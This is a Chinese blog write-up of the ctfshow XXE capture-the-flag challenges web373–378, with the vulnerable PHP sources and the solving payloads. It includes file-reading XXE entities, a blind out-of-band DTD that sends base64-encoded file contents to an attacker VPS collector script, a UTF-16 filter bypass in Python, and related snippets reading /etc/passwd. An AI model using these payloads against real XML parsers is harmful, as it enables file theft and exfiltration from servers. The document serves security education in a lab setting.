CTFSHOW-XXE

已于 2023-06-04 15:32:49 修改
阅读量469 收藏 2
点赞数
文章标签: php 开发语言
于 2023-06-03 21:04:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74456293/article/details/130916520
版权

web373

libxml_disable_entity_loader  #禁用/启用加载外部实体的功能     参数为true时为禁用,参数为false为启用
file_get_contents('php://input')   #简单理解就是接受POST请求方式传的数据
loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档
simplexml_import_dom   #把 DOM 节点转换为 SimpleXMLElement 对象
 
$creds->ctfshow 获取页面中的ctfhsow元素

源码如下: 

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
主要实现功能是读取从客户端通过 POST 请求发送过来的 XML 文件,并提取文件中 ctfshow 标签内的值进行输出。
第二行语句 libxml_disable_entity_loader(false); 用于开启 XML 实体加载器,防止 XXE XML External Entity)攻击;接下来的代码块则判断请求是否包含 XML 文件,如果存在则解析该文件并将 ctfshow 标签内的值输出到客户端。
loadXML() 函数是 DOMDocument 类提供的加载 XML 内容的方法
$creds = simplexml_import_dom($dom); 这行代码的作用是将 DOMDocument 对象转化为
SimpleXMLElement 类型的对象,方便对 XML 数据进行操作。在 PHP 中, DOMDocument 是一个类,提供了一种在脚本中创建和修改 XML 文档结构的方法。而 SimpleXMLElement 是另一个类,可以让我们更方便地读取和修改 XML 数据。
$dom 是一个由 file_get_contents 函数返回的字符串内容, 表示一个 XML 文件。
simplexml_import_dom 函数则将该字符串转换成了 DOMDocument 对象,并将其转化为
SimpleXMLElement 对象 $creds 。这样做的好处在于, SimpleXMLElement 对象使得 XML 数据操作更加简单,我们可以通过对象的属性或方法来提取 XML 标签内的数据,而不需要写繁琐的 DOM 操作代码。

这道题没有任何的过滤,直接构造payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE  xxe [
<!ENTITY xee SYSTEM "file:///flag">
]>
<aaa>
<ctfshow>
&xee;
</ctfshow>
</aaa>

之后用bp上传

web374

源码如下:

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

相比于上一题,发现无回显

没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据

在公网上上创建1.php,内容:

<?php 
file_put_contents("test.txt", $_GET['file']) ; 
?>

创建xxe.dtd文件:(这边也可以使用xxe.xml文件)

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://[vps-ip]/1.php?file=%file;'> ">
%dtd;
%xxe;

payload:

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://[vps-ip]/xxe.dtd">
%aaa;
]>
<root>123</root>
将两个外部实体 (%file %aaa) 引入 XML 文档中
%file 定义了一个实体,用于读取位于 /flag 路径下的文件并对其进行 base64 编码,则该文件的内容将以 base64编码的形式显示在 XML 响应中。
%aaa 定义了一个实体,指向远程 XML 文档。如果能够成功地利用此漏洞执行 XXE 攻击,则远程 XML 文档的内容将被解析并包含在XML 响应中。

首先用bp抓包,并将payload写入

之后返回到服务器

可以看到多出一个test.txt文件

将里面的内容进行base-64解码即可得到flag

 web375

源代码:

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

在上一题的基础上过滤了xml和version=1或0

依然使用的是上一题的payload,步骤与上一题类似,不再赘述。

web376

源码如下:

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

/i,过滤大小写,payload同上

web377

源码如下:

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

过滤了http

使用utf-16编码进行绕过

用Python(要安装requests库)

import requests
url = 'http://0ec4fe9d-6949-4e9d-a3b1-70be3bb3f01b.challenge.ctf.show/'
payload = '''
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://[vps-ip]/xxe.dtd">
%remote;
%send;
]>
'''
payload = payload.encode('utf-16')
rep = requests.post(url=url, data=payload)
print(rep.text)

web378

可以看到这个题是一个登录页面

抓包看一下

发现是回显xml 形式,而且是回显 username的值

payload:

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

将payload写入bp中就可以获取flag了

踏雪寻玉
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow XXE
lwbcsd的博客
04-03 4546
xxe web373 有回显 函数介绍 libxml_disable_entity_loader #禁用/启用加载外部实体的功能 参数为true时为禁用,参数为false为启用 file_get_contents('php://input') #简单理解就是接受POST请求方式传的数据 loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档 simplexml_import_dom #把 DOM 节点
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞分析 在 Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 ...
CTFshow_Web_XXE——web373~377
Ho1aAs‘s Blog
05-07 2270
文章目录参考文章题解web373web374~376web377完 参考文章 一篇文章带你深入理解漏洞之 XXE 漏洞 未知攻焉知防——XXE漏洞攻防 题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo
XXE漏洞学习——基础学习(ctfshow—web373)
最新发布
m0_73756016的博客
06-03 814
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。
CTFShow XXE
paidx0
08-26 1805
前言 XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题 XXE外部实体注入 web373 有回显的文件读取 <?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <paidx0> <ctfshow>&xxe;</ctfshow> </paidx0> web374~376 无回显的文件读取,禁用了版本
ctfshowXXE
njh18790816639的博客
05-26 381
XXE(XML External Entity Injection) 全称为 XML 外部实体注入。 web373 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input');//以php伪协议接收一个值 if(isset($xmlfile)){ $dom = new DOMDocument();//创建内部类Document对象 $dom->l
CTFshow XXE
starttv的博客
11-10 520
为区分嵌套实体和实体之间的关系,可以通过单双引号来间隔开,引号中嵌套一个参数实体,其%号需要写成:%也可写为16进制的%(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名;用bp抓包,可以发现传的内容是xml,并且在username处有回显,直接xxe。引用的实体,他在DTD 中定义,在 XML 文档中引用。(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体。发现了过滤,用空格绕过一下就可以了,步骤和上题一样。过滤了大小写,还是用空格绕过。
java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz<16.11.04的XXE注入(文件泄露)漏洞利用
06-04
XXE Apache OFBiz < 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...
SAML-XXE-Test:专为SAML接口生成的简单XXE测试套件
05-18
SAML-XXE-测试 一个专门为SAML接口生成的简单XXE测试套件。 介绍 是一种基于XML的标记语言,SAML端点使用的XML解析器可能容易受到。 SAML消息通常使用Base64Url()编码进行传输,并且可能会另外放气(取决于所使用的...
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
【XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
信息安全_数据安全_AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf
08-21
信息安全_数据安全_AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE 水坑攻击 金融安全 硬件攻防 可信编译 网络犯罪
ctfshow—XXE
cosmoslin的博客
10-24 996
XXE XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。 XXE可导致读取任意文件,探测内网端口,攻击内网网站,发起拒绝服务攻击,执行系统命令等。Java中的XXE支持sun.net.www.p
ctfshow--xxe
qq_51684648的博客
03-15 2614
ctfshow–xxe 有回显 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我么需要post我们的payload $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ //DOMDocument,表示整个HTML或XML文档;作为文档树的根 $dom =
CTFSHOW—XXE
灰太的表格的博客
01-31 414
(睡了一下午打算,通宵学习hhhh) web373 wa1ki0g标签可以随便改,ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>
ctfshow xxe
m0_74940843的博客
11-16 179
XXE全称为XML External Entity Injection即XMl外部实体注入漏洞1.XXE简介 XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 那有的小伙伴可能就会问了,那XML又是什么呢?2.XML概念 XML是可扩展的标记语言(eXtensible Markup Language),设
CTFshow——XXE
D.MIND 的博客
08-23 805
web373 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i
ctfshow_XXE
qq_45951598的博客
03-24 303
文章目录WEB373 WEB373 这里先放看一下理解漏洞之 XXE 漏洞 error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); //创建内部类Document对象 $dom->loadXML($xmlfile, LIBXML_NOENT |

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值